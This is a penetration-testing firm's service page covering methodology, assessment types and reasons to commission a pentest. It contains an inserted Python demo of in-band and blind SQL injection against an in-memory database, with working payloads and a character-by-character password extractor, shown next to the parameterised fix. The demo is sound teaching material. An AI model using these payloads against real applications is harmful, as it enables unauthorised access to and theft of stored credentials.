Involve security from the very beginning of your IT project
Vulnerability Assessment and pentesting in Brussels and abroad
A vulnerability assessment or penetration test gives you an external view of the security of your IT infrastructure and lets you assess the security of your environment or of your application.
The applications and components of your infrastructure project may contain vulnerabilities, or mitigations may not be configured as they should be. Automated attacks, viruses, ransomware, external attackers and internal fraudsters can take advantage of these weaknesses and cause serious harm to your organization.
Our vulnerability assessment and pentesting service helps you identify vulnerabilities and fix them before it is too late. We deliver a detailed report and professional advice on how to fix the issues and improve your security.
Which methodology do we follow?
We work in two modes: black-box or white-box pentesting.
Each methodology has its advantages and disadvantages.
Black-box pentesting: the pentester works without any prior knowledge of the systems running at the customer, acting as an external intruder trying to breach them. The findings are representative of what an attacker could achieve without specific knowledge of the installed systems, without a local account and without knowledge of the design.
The drawback is that testing time is not used to the full in this scenario: some areas of the infrastructure may remain untested (e.g. parts of the network only reachable from specific zones or IP addresses).
White-box pentesting: the pentester first reviews all documentation, architecture and design material in scope of the test (documentation on the website, application, web application or infrastructure assets). This lets him identify potential weaknesses in advance and concentrate his time on the priority attention points. In this scenario the pentester simulates an intruder who already holds a limited quantity of information about the target system (such as its design or IP addresses).
Our recommended methodology is a hybrid, partly black-box and partly white-box, to combine the advantages of each. By default we work in a non-destructive way: tests are not meant to disrupt production systems or alter data.
Our domains of expertise:
Web Application Vulnerability Assessment (WAVA)
Targets: websites and web applications
We look first for the most common vulnerability classes (OWASP Top 10), which according to industry figures account for some 90% of web attacks: SQL injection (in-band, out-of-band and blind), XSS, CSRF, etc.
Identify vulnerabilities in the framework (Java, .NET, PHP) or in its configuration.
Analyse the modules or extensions of the framework.
Validate the configuration of all layers, from operating system to application, database, etc.
Report vulnerabilities, but also conceptual and architectural issues (absence of encryption, weak password policy, etc.). This approach is risk-based and allows technical and non-technical people to understand the level of risk they are facing.
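To make concrete what a WAVA report means by "SQL injection", here is an added example (not code from the service page) that contrasts a login query built by string formatting with its parameterised fix, and shows the difference between in-band injection (rows come back directly) and boolean-based blind injection (the attacker only sees a yes/no difference but can still extract data). It runs against an in-memory sqlite3 database with constructed, hypothetical users.

```python
"""Added example (not the service page's own code): in-band and blind SQL
injection against a string-built login query, beside the parameterised fix.
Uses an in-memory sqlite3 database with constructed sample data."""
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    # Constructed sample data for the demonstration (hypothetical users).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    # VULNERABLE: user input becomes part of the SQL text, so a quote in the
    # input changes the structure of the query.
    sql = (
        "SELECT username, role FROM users WHERE username = '%s' "
        "AND password = '%s'" % (username, password)
    )
    return conn.execute(sql).fetchall()


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> list:
    # FIXED: placeholders pass the input as data; the query structure is constant.
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()


def inband_payload() -> str:
    # Classic in-band injection: close the quote, force the WHERE clause true
    # and comment out the password check.
    return "' OR 1=1 -- "


def blind_probe(conn: sqlite3.Connection, username: str, condition: str) -> bool:
    # Boolean-based blind injection: the attacker only learns whether the
    # login returned a row, i.e. whether `condition` holds for `username`.
    payload = "%s' AND (%s) -- " % (username, condition)
    return len(login_vulnerable(conn, payload, "x")) > 0


def blind_extract_password(conn: sqlite3.Connection, username: str,
                           max_len: int = 32) -> str:
    # Recover the stored password one character at a time with the oracle
    # above. The alphabet is limited to letters and digits to keep it short.
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in string.ascii_letters + string.digits:
            cond = "substr(password,%d,1)='%s'" % (pos, ch)
            if blind_probe(conn, username, cond):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the string reached
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("in-band :", login_vulnerable(db, inband_payload(), "x"))
    print("fixed   :", login_fixed(db, inband_payload(), "x"))
    print("blind   :", blind_extract_password(db, "alice"))
```

The in-band payload returns every user from the vulnerable query and nothing from the fixed one; the blind oracle recovers "s3cret" for alice without ever seeing the column in a result, which is why a tester who sees no error messages still reports blind injection as a full data-disclosure finding.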
Application security assessment
Target: fat-client applications, business applications, VoIP/IP PBX or media applications, web services, etc.
Whether for a new project, a new infrastructure or an application renewal, we test its security level and deliver a report.
Infrastructure security assessment
Target: partner links, IPsec and SSL VPNs, work-from-home solutions, extranets, wireless networks, 802.1X solutions, BYOD, datacenters, Active Directory, etc.
Besides applications, infrastructure components play a predominant role in the overall security of your organization. Make sure they are securely configured and that their patch level is up to date.
Social engineering assessment
Target: test your incident response and evaluate how your employees react to external threats.
Social engineering is an excellent tool to get the maximum of information in the minimum of time. So-called spear-phishing attacks target just a few users who have access to extremely sensitive information (such as the CEO, the HR director or system administrators). These people may receive by email a fake LinkedIn invitation containing a résumé, or a fake security update from a software supplier. They open the attachment or the link in the message and their computer is infected with malware.
We can simulate this kind of attack and, with your agreement, contact some of your staff members. This lets us establish overall statistics on how users react. The exercise is very useful before and/or after a security awareness session for your staff. Some staff members are security aware and can help the organization by alerting ICT services to potential cyber-attacks; others have no knowledge of cyber-security and could easily fall victim to attackers. Identifying those users lets you offer them the opportunity to learn about cyber-security, the potential dangers and how to react to these threats.
Why set up a pentest?
There are many reasons. Here is a non-exhaustive list of the reasons customers have previously contacted us to set up a pentest:
- Build a governance process around the development and deployment of new applications in the organization
- Set up a validation process before the go-live of Internet-facing applications
- Mitigate risks related to conceptual or implementation issues in infrastructure or application projects
- Answer audit findings or comply with a standard or regulation
- Evaluate the security maturity of your organization, or of a sister organization that was recently acquired
- React immediately to a security problem: ensure all assets have been correctly patched
- Anticipate attacks, take the initiative and be an actor in security prevention
- Test your guest Wi-Fi network: can a visitor reach your internal network?
- Test your SSL VPN solution: our staff relies heavily on home working, but can an attacker bypass our policies and connect to the enterprise network from an unauthorized computer?
- Test your wireless solutions: how well does our wireless setup protect against unauthorized access?
- Our main firewall has more than 3000 rules: are they up to date? Are they in line with the application documentation? Is the approval process for adding and deleting rules under control?
- Part of our ICT infrastructure is outsourced, and the IT company managing it accesses our environment remotely. Is this access channel sufficiently secure, and what would happen in case of misuse? Do we have enough auditing to trace what happened?
- How many servers are still running outdated operating systems or databases?